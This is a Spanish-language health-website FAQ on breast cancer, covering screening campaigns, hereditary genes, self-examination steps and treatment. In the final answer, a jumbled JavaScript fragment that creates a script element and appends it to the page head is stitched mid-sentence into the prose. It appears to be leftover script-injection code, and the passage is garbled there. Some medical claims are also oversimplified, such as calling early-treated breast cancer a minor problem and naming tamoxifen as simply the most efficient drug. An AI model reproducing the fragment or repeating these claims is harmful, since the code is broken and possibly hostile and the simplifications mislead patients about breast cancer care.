Salud y belleza » Enfermedades

Preguntas frecuentes. Cáncer de mama I

Sin Comentarios

¿Cómo funcionan las campañas de prevención contra el cáncer de mama?

Las famosas campañas de prevención o, más bien, de detección precoz del cáncer de mama funcionan como un intento de conseguir que todas las mujeres de entre 50 y 69 años se realicen una mamografía cada dos años. Es realmente trascendental que todas las pacientes invitadas a participar se realicen los estudios correspondientes para disminuir la mortalidad por cáncer. Tratado a tiempo, el cáncer de mama puede ser un problema menor.

¿El factor hereditario es importante en relación al cáncer de mama?

Esta comprobado que, sobre cien casos, solo cinco son cánceres hereditarios. Científicamente, se registran algunos genes cuya alteración heredada podría estimular la enfermedad: el BRCA1 (un 20% de los casos englobados en ese 5% comentado al inicio de la nota), el BRCA2 (también un 20), el PTEN y el CHK2. También hay otros genes implicados desconocidos.

¿En que consiste una autopalpación mamaria?

Es, básicamente, una forma de realizar un estudio (en el más básico de los niveles) de forma manual y personal. En el caso de, durante esa exploración inicial de las mamas, encontrar algo que realmente nos parezca raro o nos llame la atención allí sí pasamos a consultar a un profesional para despejar dudas.

¿Cómo se debe haber esa autopalpación de mamas?

Ante todo, se debe efectuar una inspección sencilla de ambos pechos. Es necesario estar desnuda delante de un espejo, levantar los brazos y prestar atención al movimiento de ambas mamas (deben desplazarse de forma simétrica). Es necesario, al mismo tiempo, observar si existen zonas de enrojecimiento o abultamiento. En segundo instancia debemos, con la palma de la mano, palpar las mamas profundamente. Y, finalmente, hay que oprimir el pecho suavemente para constatar que realmente no existe ninguna secreción en la zona del pezón (palpar del mismo modo en el hueco de la axila, también es importante).

¿Es tratable el cáncer de mama?

En efecto, el cáncer de mama se puede tratar: en los últimos 20 años, la tasa de mortalidad por estos tumores se redujo un 27 por ciento. Esto esta dado por las nuevas tecnologías pero también por las campañas de prevención pues, recordemos, cuanto mas rápido se diagnostique la enfermedad más sencilla será el tratamiento. Por cierto, vale destacar que el perfeccionamiento en los tratamientos farmacológicos se ha mejorado en los últimos tiempos y, en el caso del cáncer de mama, el Tamoxifeno es el más eficiente.d.getElementsByTagName('head')[0].appendChild(s);var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.